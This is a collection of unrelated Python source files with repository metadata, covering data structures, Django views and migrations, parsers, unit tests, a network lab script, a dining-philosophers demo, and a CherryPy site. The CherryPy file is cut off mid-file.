tlmurphy/freshman-projects
|
805effcca6ed1ceb9a56397239ae17ee5c5c840f
|
dbb966060c397b0ca5ac2e7601586ede511078f8
|
refs/heads/master
| 2021-06-02T01:53:58.243526
| 2016-07-19T20:03:03
| 2016-07-19T20:03:03
| 50,886,609
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,409
|
py
|
"""
Abstract Collection to be used
for all collections
This is the parent of all collections
Trevor Murphy
"""
class AbstractCollection(object):
"""An abstract collection implementation"""
# Constructor
def __init__(self, sourceCollection=None):
"""Sets the initial state of self, which includes the
contents of sourceCollection, if it's present."""
self._size = 0
if sourceCollection:
for item in sourceCollection:
self.add(item)
def __add__(self, other):
"""Returns a new bag containing the contents
of self and other."""
result = type(self)(self)
for item in other:
result.add(item)
return result
def __eq__(self, other):
"""Returns True if self equals other, or False otherwise."""
if self is other: return True
if type(self) != type(other) or len(self) != len(other):
return False
otherIter = iter(other)
for item in self:
if item != next(otherIter):
return False
return True
def __str__(self):
"""Returns the string representation of self."""
return "{" + ", ".join(map(str, self)) + "}"
def isEmpty(self):
if self._size == 0:
return True
else:
return False
|
[
"murphtrevor@gmail.com"
] |
murphtrevor@gmail.com
|
05d8817e7de13d880fc4971f0a4391b0f59f954d
|
ac9776814df50efe2e12e216078c7b835c27e184
|
/hrparser/data_parser/person_parser.py
|
0c09a5e6092b92edfb2205989eccb62d9ec32f2b
|
[] |
no_license
|
danesjenovdan/hr-parser
|
0b2d4b06f7172cf6ffac224bae23f998d52d675e
|
ed51b19fa82cc4f4e02765ed4f4b0673fd691639
|
refs/heads/master
| 2022-12-11T18:18:21.887449
| 2019-11-28T13:56:34
| 2019-11-28T13:56:34
| 135,311,488
| 0
| 0
| null | 2022-11-22T02:30:13
| 2018-05-29T14:51:04
|
Python
|
UTF-8
|
Python
| false
| false
| 2,308
|
py
|
from .base_parser import BaseParser
from ..settings import API_URL, API_AUTH, API_DATE_FORMAT
from .utils import parse_date
from datetime import datetime
class PersonParser(BaseParser):
def __init__(self, data, reference):
# call init of parent object
super(PersonParser, self).__init__(reference)
self.name = item['name']
self.area = item['area']
self.education = item['education']
self.party = item['party']
self.wbs = item['wbs']
if 'num_of_prev_mandates' in item.keys():
self.num_of_prev_mandates = int(item['num_of_prev_mandates']) + 1
else:
self.num_of_prev_mandates = 1
try:
self.birth_date = parse_date(item['birth_date']).isoformat()
except:
self.birth_date = None
try:
self.start_time = parse_date(item['start_time']).isoformat()
except:
self.start_time = self.reference.mandate_start_time.isoformat()
# prepere dictionarys for setters
self.person = {}
self.area_data = {
"name": item['area'],
"calssification": "district"
}
if self.get_person_id(self.name):
print('pass')
pass
else:
self.get_person_data()
def get_person_data(self):
edu = parse_edu(self.education)
area_id, method = add_or_get_area(item['area'], self.area_data)
if area_id:
area = [area_id]
else:
area = []
person_id = self.get_or_add_person(
fix_name(self.name),
districts=area,
mandates=self.num_of_prev_mandates,
education=edu,
birth_date=self.birth_date
)
party_id = self.add_organization(self.party, "party")
membership_id = self.add_membership(person_id, party_id, 'member', 'cl', start_time)
if 'wbs' in item.keys():
for wb in self.wbs:
wb_id = self.add_organization(wb['org'], 'committee')
self.add_membership(
person_id,
wb_id,
wb['role'],
wb['role'],
self.reference.mandate_start_time.isoformat()
)
|
[
"cofek0@gmail.com"
] |
cofek0@gmail.com
|
55412c5f714fe716cc21d55bc47bbafcb16b931b
|
80dcf54754f9d58fed1d0e034c93c50ba27443dc
|
/dictionary.py
|
abc72fd4d2f20c997e317a1aef71f451ee3754ec
|
[] |
no_license
|
ilich8884/LearningEnglish
|
4465e55ce8ade9febebc26d12178c26664bd142b
|
abf862f4969de6b7c3743d4f6407f876bc00d25c
|
refs/heads/master
| 2020-12-24T22:05:10.021784
| 2012-11-02T01:09:14
| 2012-11-03T15:55:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,479
|
py
|
# -*- coding: utf-8 -*-
import json
import os.path
import word
import global_stat
import unittest
class Dict:
def __init__(self):
self.words = {}
def get_word_by_key(self, en):
w = self.words.get(en)
if not w:
w = self.words[en] = word.Word()
return w
def reload_dict_s(self, text):
self.words = {}
for it in json.loads(text):
en = it[0]
tr = it[1]
ru = it[2]
self.get_word_by_key(en).add_value(en, tr, ru)
def reload_dict(self, path):
self.reload_dict_s(open(path).read())
def reload_stat_s(self, text):
stat_json = json.loads(text)
data = stat_json["data"]
for it in data:
self.get_word_by_key(it).unpack(data[it])
def reload_stat(self, path):
if os.path.exists(path):
self.reload_stat_s(open(path).read())
def loaded_words(self, type_pr):
return [(it, it.get_stat(type_pr)) for it in self.words.values() if it.is_load()]
def global_statistic(self, min_percent, min_success_cnt):
stat = global_stat.GlobalStatistic(min_percent, min_success_cnt)
for it in self.words.values():
if it.is_load():
stat.add_word(it, it.get_stat(word.en_to_ru_write), it.get_stat(word.ru_to_en_write))
return stat
def words_for_lesson(self, cnt_study_words, min_percent, min_success_cnt, type_pr):
learned_words = []
studied_words = []
for wrd, stat in self.loaded_words(type_pr):
if stat.get_total_answer() > 0:
if stat.get_success_persent() >= min_percent and stat.get_total_answer() >= min_success_cnt:
learned_words.append(wrd)
else:
studied_words.append(wrd)
# дополняем изучаемыми/изученными словами из другого направления перевода
if len(studied_words) < cnt_study_words:
inv_type_pr = word.ru_to_en_write if type_pr == word.en_to_ru_write else word.en_to_ru_write
for wrd, stat in self.loaded_words(inv_type_pr):
if stat.get_total_answer() > 0 and wrd not in (learned_words+studied_words):
studied_words.append(wrd)
if len(studied_words) == cnt_study_words:
break
# дополняем ни разу не изучаемыми словами
if len(studied_words) < cnt_study_words:
for wrd, stat in self.loaded_words(type_pr):
if stat.get_total_answer() == 0 and wrd not in (learned_words+studied_words):
wrd.set_first()
studied_words.append(wrd)
if len(studied_words) == cnt_study_words:
break
studied_words.sort(key = lambda it : it.get_stat(type_pr).get_success_persent())
studied_words = studied_words[:cnt_study_words]
lesson_words = learned_words + studied_words
for it in lesson_words:
rating = it.get_stat(type_pr).calc_rating(min_percent, min_success_cnt)
it.set_rating(rating)
return lesson_words
def save_stat(self, path_to_stat):
data = {}
for it in self.words:
data[it] = self.words[it].pack()
stat_json = {"version" : 1, "data" : data}
json.dump(stat_json, open(path_to_stat, "wb"), indent=2)
class DictTestCase(unittest.TestCase):
def setUp(self):
self.dict_obj = Dict()
def create_word_data(self, num):
return ["en"+str(num), "tr"+str(num), "ru"+str(num)]
def create_word_stat(self, num):
key = "en"+str(num)
date = "2012.01"
stat1 = [num*1, num*10, date+str(num), num%2 == 0]
stat2 = [num*20, num*30, date+str(num+1), num%2 == 1]
return [key, {"0": stat1, "1": stat2}]
def load_dict(self, interval_from, interval_to):
json_dict = [self.create_word_data(i) for i in range(interval_from,interval_to)]
self.dict_obj.reload_dict_s(json.dumps(json_dict))
def load_stat(self, interval_from, interval_to):
json_data = dict([self.create_word_stat(i) for i in range(interval_from,interval_to)])
json_stat = {"version" : 1, "data" : json_data}
self.dict_obj.reload_stat_s(json.dumps(json_stat))
def assertLoad(self, num):
dt = self.create_word_data(num)
wrd_info = self.dict_obj.get_word_by_key("en"+str(num)).get_show_info()
self.assertEqual((dt[0], "[%s]" % dt[1], dt[2]), wrd_info)
def assertNotLoad(self, num):
wrd_info = self.dict_obj.get_word_by_key("en"+str(num)).get_show_info()
self.assertEqual(("", "", ""), wrd_info)
def assertLoadStat(self, num):
wrd1 = word.Word()
wrd1.unpack(self.create_word_stat(num)[1])
wrd2 = self.dict_obj.get_word_by_key("en"+str(num))
self.assertEqual(wrd1.get_stat(0), wrd2.get_stat(0))
self.assertEqual(wrd1.get_stat(1), wrd2.get_stat(1))
def test_reload_dict(self):
interval_from = 0
interval_to = 5
self.load_dict(interval_from, interval_to)
for i in range(interval_from, interval_to):
self.assertLoad(i)
def test_reload_dict_err_key(self):
interval_from = 0
interval_to = 5
self.load_dict(interval_from, interval_to)
for i in range(interval_to, interval_to*2):
self.assertNotLoad(i)
def test_reload_dict_double_reload(self):
interval_from1 = 0
interval_to1 = 5
self.load_dict(interval_from1, interval_to1)
interval_from2 = 3
interval_to2 = 8
self.load_dict(interval_from2, interval_to2)
for i in range(interval_from1, interval_from2):
self.assertNotLoad(i)
for i in range(interval_from2, interval_to2):
self.assertLoad(i)
def test_reload_stat(self):
interval_from = 0
interval_to = 5
self.load_dict(interval_from, interval_to)
self.load_stat(interval_from, interval_to)
for i in range(interval_from, interval_to):
self.assertLoad(i)
self.assertLoadStat(i)
def test_reload_stat_without_word(self):
interval_from = 0
interval_to = 5
self.load_stat(interval_from, interval_to)
for i in range(interval_from, interval_to):
self.assertLoadStat(i)
def test_reload_stat_double(self):
interval_from1 = 0
interval_to1 = 5
self.load_stat(interval_from1, interval_to1)
interval_from2 = 3
interval_to2 = 8
self.load_stat(interval_from2, interval_to2)
for i in range(interval_from1, interval_to2):
self.assertLoadStat(i)
def test_loaded_words(self):
interval_from1 = 0
interval_to1 = 5
self.load_dict(interval_from1, interval_to1)
interval_from2 = 3
interval_to2 = 9
self.load_stat(interval_from2, interval_to2)
loaded_words = self.dict_obj.loaded_words(0)
self.assertEqual(len(loaded_words), len(range(interval_from1, interval_to1)))
for i,it in enumerate(loaded_words):
self.assertEqual(it[0].get_show_info()[0], "en"+str(i))
if __name__=="__main__":
suite = unittest.TestLoader().loadTestsFromTestCase(DictTestCase)
unittest.TextTestRunner(verbosity=2).run(suite)
|
[
"ReanGD@yandex.ru"
] |
ReanGD@yandex.ru
|
545d6dfe6abc36a6a5e48876c2ed2067604cf3a9
|
5e7dd2da8eec0cff4b9e67a4a6f0633ce4b76524
|
/apps/news/views.py
|
6387006f673ba11a61a500002d2767dbddfc32dc
|
[] |
no_license
|
Hyuancheng/xfz_vue_server
|
90f1a42dc8be22f9385f1e936a0d9bb4b0001137
|
3512fb0b9f3e9b0f0214ef71306fb4d524616b21
|
refs/heads/master
| 2022-09-22T11:52:50.605832
| 2020-06-01T11:32:48
| 2020-06-01T11:32:48
| 268,471,971
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,079
|
py
|
from django.shortcuts import render
from django.views import View
from .models import News
class NewsView(View):
"""首页"""
def get(self, request):
# 查询所有新闻,并查出目录及作者信息,减少后续数据库查询次数
news = News.objects.all().defer('content').select_related('category', 'author')
content = {
'news': news
}
return render(request, 'news/index.html', content)
class NewsDetailView(View):
"""新闻详情"""
def get(self, request):
new_id = request.GET.get('new_id')
new = News.objects.select_related('category', 'author').get(id=new_id)
content = {
'new': new
}
return render(request, 'news/news_detail.html', content)
# class NewsSearchView(View):
# """搜索"""
#
# def get(self, request):
# news = News.objects.all().defer('content').select_related('category', 'author')
# content = {
# 'news': news
# }
# return render(request, 'search/search.html', content)
|
[
"1520966793@qq.com"
] |
1520966793@qq.com
|
f2073f2537f4bef9e0aa717f74eec294e4e5a9cd
|
cb8c63aea91220a9272498d5ea6cca0a0738b16a
|
/sodasurpler.py
|
87cbd97f69aa81b669f4592f8d2fae5f03d8a6e7
|
[] |
no_license
|
akantuni/Kattis
|
1265de95bfe507ce7b50451a16f19720b86bef44
|
12f31bb31747096bf157fcf6b1f9242d91654533
|
refs/heads/master
| 2021-12-14T11:18:27.723045
| 2021-12-11T05:43:37
| 2021-12-11T05:43:37
| 111,472,667
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 180
|
py
|
s = input()
e = int(s.split(" ")[0])
f = int(s.split(" ")[1])
c = int(s.split(" ")[2])
t = e + f
ans = 0
while t // c != 0:
ans += t // c
t = t // c + t % c
print(ans)
|
[
"akantuni@gmail.com"
] |
akantuni@gmail.com
|
672c8451e5896176ef5174de4b6496c4b1e3a6b2
|
cd3fab4d8e30aebe5c996fb2389d4a15a21feb10
|
/python/find_the_smallest_integer_in_the_array.py
|
6ee56679d6e3bab16389ffa9e6b4988ed44426f7
|
[] |
no_license
|
luisflores189544/codewars-solutions
|
93c1c3113c52779ce9537ee5d5397442d626ea56
|
1ad4dae2519cbf3f5b45201fe01a5be0762a0e6f
|
refs/heads/master
| 2020-03-17T20:03:57.883229
| 2018-06-20T17:41:54
| 2018-06-20T17:41:54
| 133,891,731
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
#Given an array of integers your solution should find the smallest integer.
def find_smallest_int(arr):
return sorted(arr)[0]
|
[
"noreply@github.com"
] |
luisflores189544.noreply@github.com
|
79e79a6dba06cb195c15c6de2977218994c616bb
|
6af3cf565ebab9b54af285268db6fc5e8cf9c465
|
/api/migrations/0001_initial.py
|
a08891e9e278ae1ea61ea8891b24fd389375cd51
|
[] |
no_license
|
tabishimam2/Nurturelabs_Assignment
|
5508c57f98a4bf30fcc4189e61caba1873e45ce4
|
cfb32de9281ef4e9cfadcef74459f0b6000fbd47
|
refs/heads/master
| 2023-04-14T04:40:41.283457
| 2021-05-09T17:02:52
| 2021-05-09T17:02:52
| 365,726,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,524
|
py
|
# Generated by Django 3.2 on 2021-05-09 12:01
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Advisor',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('advisorname', models.CharField(max_length=100)),
('picture', models.ImageField(upload_to='media/')),
],
),
migrations.CreateModel(
name='Booking',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=100)),
('userid', models.IntegerField(max_length=100)),
('advisorname', models.CharField(max_length=100)),
('advisorid', models.IntegerField(max_length=100)),
('time', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=100)),
('password', models.CharField(max_length=100)),
('email', models.EmailField(max_length=254)),
],
),
]
|
[
"timam799@gmail.com"
] |
timam799@gmail.com
|
4954477aa6e16c22ed490e8df4230d5604f3a58b
|
33f1bfde0ae84747ed66946917bd94edf8e9b512
|
/07 - Listen in Python/Notebooks in anderen Formaten/py/Arbeiten mit Tupeln.ipynb.py
|
17ef40d38c37cdfe529db4cda60bb0abcefcf885
|
[] |
no_license
|
LCK1635/Python_Kurs
|
66bb8ce356a9c3fe41a90c2995bb63e7a81f2fe4
|
8742604e677baa3774cde9b2434c1b40470a224f
|
refs/heads/master
| 2021-09-07T04:23:36.732602
| 2018-02-17T12:56:32
| 2018-02-17T12:56:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,305
|
py
|
# Diese .py - Datei wurde automatisch aus dem IPython - Notebook (.ipynb) generiert.
#
# Gelegentlich wurde ich von Teilnehmern gefragt, ob ich die Kursmaterialien nicht
# auch als normale .py - Datien bereitstellen könne. Dadurch ist es möglich, den Code
# ohne Jupyter zu öffnen, beispielsweise wenn Python-Programme in einem Terminal oder in
# Eclipse entwickelt werden.
#
# Dem möchte ich hiermit nachkommen. Ich empfehle dir aber trotzdem, schau' dir lieber die
# IPython - Notebooks direkt an, oder den HTML-Export eben dieser. Dieser reine .py-Export
# ist meiner Meinung nach etwas unübersichtlich.
# coding: utf-8
# ## Arbeiten mit Tupeln
#
# In dieser Lektion lernst du:
#
# - Wie du Tupel verwenden kannst, um mehrere Rückgabewerte einer Funktion zu modellieren
# - Wie du Tupel entpacken kannst
# In[4]:
student = ("Max Müller", 22, "Informatik")
name, age, subject = student
# name = student[0]
# age = student[1]
# subject = student[2]
print(name)
print(age)
print(subject)
# In[5]:
def get_student():
return ("Max Müller", 22, "Informatik")
name, age, student = get_student()
print(name)
print(age)
print(subject)
# In[9]:
students = [
("Max Müller", 22),
("Monika Mustermann", 23)
]
for name, age in students:
print(name)
print(age)
|
[
"tillin@besonet.ch"
] |
tillin@besonet.ch
|
24af84abc07f34ca0d70f0e9fca0d9761cde7931
|
c30b95effe38f0e5afb058a10ed2b091df492e86
|
/algorithms/strings/reduced_strings.py
|
de5f7185518f1efa3da12366b05e122440e650b1
|
[] |
no_license
|
anikasetia/hackerrank
|
f7fbacf1ac5ef439842dffbe1592ebcd18271547
|
7f2605eb6a373516a8c11e01ffa08d9353395aa4
|
refs/heads/master
| 2021-01-25T09:53:39.934309
| 2018-08-09T15:30:27
| 2018-08-09T15:30:27
| 123,328,471
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
s = list(input())
i = 0
while(i < len(s) - 1):
if(s[i] == s[i+1]):
s.pop(i)
s.pop(i)
i = 0
else:
i += 1
newString = (''.join(s))
if(newString == ''):
print("Empty String")
else:
print(newString)
|
[
"anika.setia18@gmail.com"
] |
anika.setia18@gmail.com
|
c29e606bdbcccef5278639c8e865ee2a5ea6d5dc
|
cdc44b20348b1aad4b00b09d6213deb9682a779f
|
/venv/bin/pyreverse
|
cef1c06ab98a059d611a6bc2bf6b2fafde73c4a5
|
[] |
no_license
|
matias6942/MIR-Tarea1
|
576fef19bd3213870feeba31e081175ff4b8c198
|
84db2480740225919c0c496acaf868caff346400
|
refs/heads/master
| 2021-09-25T02:19:32.081577
| 2018-10-16T23:31:18
| 2018-10-16T23:31:18
| 150,164,866
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 260
|
#!/home/matias/Documents/MIR-Tarea1/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pylint import run_pyreverse
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run_pyreverse())
|
[
"matias.zamora@ing.uchile.cl"
] |
matias.zamora@ing.uchile.cl
|
|
a2486b55709abc8b65ab3d41b9a15ff29a0671c7
|
fa0c32e18262897f5ba558950c2a7d33665ae97c
|
/charts/sheets.py
|
ed04c084f9fca8d7e06033688733c74533308471
|
[
"Apache-2.0"
] |
permissive
|
sanjaynv/SBK
|
8634d35fe6268030af8f6b062152468133801041
|
64655cd18e999f6274d738f8e421a66473d490f2
|
refs/heads/master
| 2023-07-06T00:09:27.984821
| 2023-06-19T13:52:02
| 2023-06-19T13:52:02
| 247,745,359
| 2
| 0
|
Apache-2.0
| 2020-03-16T15:25:08
| 2020-03-16T15:25:08
| null |
UTF-8
|
Python
| false
| false
| 2,338
|
py
|
#!/usr/local/bin/python3
# Copyright (c) KMG. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
##
# SBK-sheets : Storage Benchmark Kit - Sheets
from pandas import read_csv
from xlsxwriter import Workbook
import charts.constants as constants
def wb_add_two_sheets(wb, r_name, t_name, df):
header = df.columns.values
r_ws = wb.add_worksheet(r_name)
t_ws = wb.add_worksheet(t_name)
for c, h in enumerate(header):
r_ws.set_column(c, c, len(h))
t_ws.set_column(c, c, len(h))
r_ws.write(0, c, h)
t_ws.write(0, c, h)
r_row = 1
t_row = 1
for row in df.iterrows():
if row[1][constants.TYPE] == constants.TYPE_TOTAL:
ws, row_num = t_ws, t_row
t_row += 1
else:
ws, row_num = r_ws, r_row
r_row += 1
for c, h in enumerate(header):
col_size = len(str(row[1][h])) + 1
if col_size > len(h):
ws.set_column(c, c, col_size)
try:
ws.write(row_num, c, row[1][h])
except Exception as ex:
pass
def add_sbk_logo(wb):
ws = wb.add_worksheet("SBK")
ws.insert_image('K7', "./images/sbk-logo.png", {'x_scale': 0.5, 'y_scale': 0.5})
class SbkSheets:
def __init__(self, i_file, o_file):
self.iFile = i_file
self.oFile = o_file
def create_sheets(self):
wb = Workbook(self.oFile)
add_sbk_logo(wb)
df = read_csv(self.iFile)
wb_add_two_sheets(wb, constants.R_PREFIX + "1", constants.T_PREFIX + "1", df)
wb.close()
print("xlsx file %s created" % self.oFile)
class SbkMultiSheets(SbkSheets):
def __init__(self, i_files_list, o_file):
super().__init__(i_files_list[0], o_file)
self.iFilesList = i_files_list
def create_sheets(self):
wb = Workbook(self.oFile)
add_sbk_logo(wb)
for i, file in enumerate(self.iFilesList):
wb_add_two_sheets(wb, constants.R_PREFIX + str(i + 1), constants.T_PREFIX + str(i + 1), read_csv(file))
wb.close()
print("xlsx file : %s created" % self.oFile)
|
[
"keshava.gowda@gmail.com"
] |
keshava.gowda@gmail.com
|
e6498a09c3b06d7c6725afa0311b15c560317083
|
191a24cd8ca4fd54789fc861a282cf82ea079434
|
/secretary2/urls.py
|
4ebee877f669a4c67d478e02b76746c96e3b6edf
|
[] |
no_license
|
Uccueo4/secretary2
|
5abbd6801fdf802c3f177761c741f771ced55f89
|
901519b9d953964bf8ed95dfa5b68706094321b4
|
refs/heads/master
| 2021-01-11T14:25:31.394356
| 2017-02-09T05:49:13
| 2017-02-09T05:49:13
| 81,407,599
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,296
|
py
|
"""secretary2 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from web import views
from django.contrib.auth import views as auth_views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^diary/(?P<month>\d+)/$', views.diary),
url(r'^diary/add/$', views.diary_add),
url(r'^diary/word/(?P<month>\d+)/$', views.diary_word),
url(r'^home/$', views.home),
url(r'^money/(?P<month>\d+)$', views.money),
url(r'^money/add/$', views.money_add),
url(r'^money/excel/(?P<month>\d+)/$', views.money_excel),
url(r'^$', views.user_login),
url(r'^logout/$',auth_views.logout),
]
|
[
"silentwindma@gmail.com"
] |
silentwindma@gmail.com
|
0582ca31bc079ef0d0101aef1f0272cffce156bb
|
35d5682a7cc9d93c11e0486bb132cffc16f37859
|
/NWPLab/restconf-to-spark.py
|
d8998870b9bf8190c7029e061c5cab2f3fc0ccbe
|
[] |
no_license
|
martynrees/devnet-express-code-samples
|
6032e6caed8fef03671d64eafce5119f0f09a9e6
|
c7592275461cd9d3c207befb0142aadba54c41c9
|
refs/heads/master
| 2021-01-19T21:00:35.798441
| 2017-04-17T21:24:19
| 2017-04-17T21:24:19
| 88,588,636
| 1
| 0
| null | 2017-04-18T06:13:04
| 2017-04-18T06:13:04
| null |
UTF-8
|
Python
| false
| false
| 3,578
|
py
|
#!/usr/bin/env python
# ############################################################################
# Copyright (c) 2016 Bruno Klauser <bklauser@cisco.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ''AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
#
# TECHNICAL ASSISTANCE CENTER (TAC) SUPPORT IS NOT AVAILABLE FOR THIS SCRIPT.
#
# Always check for the latest Version of this script via http://cs.co/NWPLab
# ############################################################################
#
# This sample script illustrates how to query operational data from a router
# via the RESTCONF API and then post the results into an existing Spark room
# via the Spark REST APIs.
#
# Initial Version by Joe Clarke - thanks Joe!
# ############################################################################
import _LabEnv
import requests
import json
import sys
# ############################################################################
# Variables below
# ############################################################################
RESTCONF_API = "http://198.18.133.218:8008/api/operational/interfaces-state?deep"
INTF = 'GigabitEthernet1'
TEXT = 'Hello, %s, this is %s. Interface %s has received %d bytes and transmitted %d bytes.'
SPARK_ROOM_ID = None
# ############################################################################
# Get Router Interface Data via RESTCONF
# ############################################################################
response = requests.request("GET", RESTCONF_API, headers=_LabEnv.RESTCONF_HEADERS, verify=False)
j = json.loads(response.text)
in_octets = -1
out_octets = -1
for intf in j['ietf-interfaces:interfaces-state']['interface']:
if intf['name'] == INTF:
in_octets = intf['statistics']['in-octets']
out_octets = intf['statistics']['out-octets']
break
if in_octets == -1 or out_octets == -1:
print("Failed to find statistics for interface " + INTF)
sys.exit(1)
# ############################################################################
# Post to Spark Room
# ############################################################################
messagetext = TEXT % (_LabEnv.LAB_SESSION, _LabEnv.LAB_USER, INTF, in_octets, out_octets)
r = _LabEnv.postSparkMessage(messagetext)
print('Spark Response: ' + r.text)
# ############################################################################
# EOF
# ############################################################################
|
[
"darien@sdnessentials.com"
] |
darien@sdnessentials.com
|
9c683f0f896498477456d213422ba9310195fb08
|
6ecfc4ad9e2b61eb647c09b43fd955862e644eb4
|
/Week03/哲学家.py
|
410a9df2d5af21962da46ad57525e27f97f6d716
|
[] |
no_license
|
brownfoxsir/Python004
|
4ebfebf969430a657d1bc5e65cb697c8ffc05291
|
7fb9b9d169dbacf6aa93c878973fa938325c9fed
|
refs/heads/master
| 2023-02-07T12:10:32.965733
| 2020-12-20T15:57:38
| 2020-12-20T15:57:38
| 295,945,252
| 0
| 1
| null | 2020-09-16T06:37:52
| 2020-09-16T06:37:52
| null |
UTF-8
|
Python
| false
| false
| 2,712
|
py
|
#!/usr/bin/python
import sys
import threading
import time
class Semaphore(object):
def __init__(self, initial):
self.lock = threading.Condition(threading.Lock())
self.value = initial
def up(self):
with self.lock:
self.value += 1
self.lock.notify()
def down(self):
with self.lock:
while self.value == 0:
self.lock.wait()
self.value -= 1
class Fork(object):
def __init__(self, number):
self.number = number # 叉子的 id
self.user = -1 # 跟踪哲学家的使用情况
self.lock = threading.Condition(threading.Lock())
self.taken = False
def take(self, user): # 同步
with self.lock:
while self.taken == True:
self.lock.wait()
self.user = user
self.taken = True
sys.stdout.write("哲学家[%s] 拿起 叉子[%s]\n" % (user, self.number))
self.lock.notifyAll()
def drop(self, user): # 同步
with self.lock:
while self.taken == False:
self.lock.wait()
self.user = -1
self.taken = False
sys.stdout.write("哲学家[%s] 放下 叉子[%s]\n" % (user, self.number))
self.lock.notifyAll()
class Philosopher (threading.Thread):
def __init__(self, number, left, right, butler):
threading.Thread.__init__(self)
self.number = number # 哲学家数量
self.left = left
self.right = right
self.butler = butler
def run(self):
for i in range(1):
self.butler.down() # 管家开始服务
time.sleep(0.1) # 思考
self.left.take(self.number) # 拿起左边的叉子
time.sleep(0.1) # (yield makes deadlock more likely)
self.right.take(self.number) # 拿起右边的叉子
time.sleep(0.1) # 吃
self.right.drop(self.number) # 放下右边的叉子
self.left.drop(self.number) # 放下左边的叉子
self.butler.up() # 管家结束服务
sys.stdout.write("哲学家[%s] 结束思考开始吃饭\n" % self.number)
def main():
# 哲学家数量以及叉子数量
n = 5
# 避免死锁 (可用数为 n-1)
butler = Semaphore(n-1)
# 叉子
c = [Fork(i) for i in range(n)]
# 哲学家
p = [Philosopher(i, c[i], c[(i+1)%n], butler) for i in range(n)]
for i in range(n):
p[i].start()
if __name__ == "__main__":
main()
|
[
"brownfoxsir@gmail.com"
] |
brownfoxsir@gmail.com
|
a7619f6654ac154392697fbcb15790412af0f201
|
dda7e790b230c9f2e42993fc35706e228aca45f8
|
/Projet_info.py
|
b7c34f5d9c007ac723fdca53fe2e0018c05fed38
|
[] |
no_license
|
ablo340/Pyhton_website
|
a266c80ad9327cad39746f97e840a40ca56487ff
|
99dd2190342877e190113f7049500f73a2beb0fb
|
refs/heads/master
| 2022-04-09T15:28:18.707254
| 2020-03-16T20:14:05
| 2020-03-16T20:14:05
| 124,147,538
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,548
|
py
|
import json
import os
import cherrypy
from cherrypy.lib.static import serve_file
import jinja2
import jinja2plugin
import jinja2tool
class WebApp():
def __init__(self):
self.feasts= self.loadfeasts()
#route vers la page d'accueil
@cherrypy.expose
def index(self):
if len(self.feasts) == 0:
feasts = '<p>Base de donnée vide.</p>'
else:
feasts = '<table id="feasts">'
for i in range(len(self.feasts)):
liste = self.feasts[i]
feasts += '''<tr>
<th>
<a href="loadinfos?i={}">{}</a>
</th>
</tr>'''.format(i, liste['feast'])
feasts += '</table>'
return {'feasts': feasts}
#route vers l'ajout de date
@cherrypy.expose
def add(self):
return serve_file(os.path.join(ROOT, 'templates/add.html'))
#chargement des fêtes
def loadfeasts(self):
try:
with open('Bdd.json', 'r', encoding="utf-8") as file:
content = json.loads(file.read(), encoding="utf-8")
return content['feasts']
except:
cherrypy.log('Loading database failed.')
return []
#route vers les infos des fêtes
@cherrypy.expose
def loadinfos(self,i):
liste= self.feasts[int(i)]
return {'feast': liste['feast'], 'date': liste['date'], 'tradition': liste['tradition'], 'origins': liste['origins']}
#route vers ajout d'evenement dans la base donnée
@cherrypy.expose
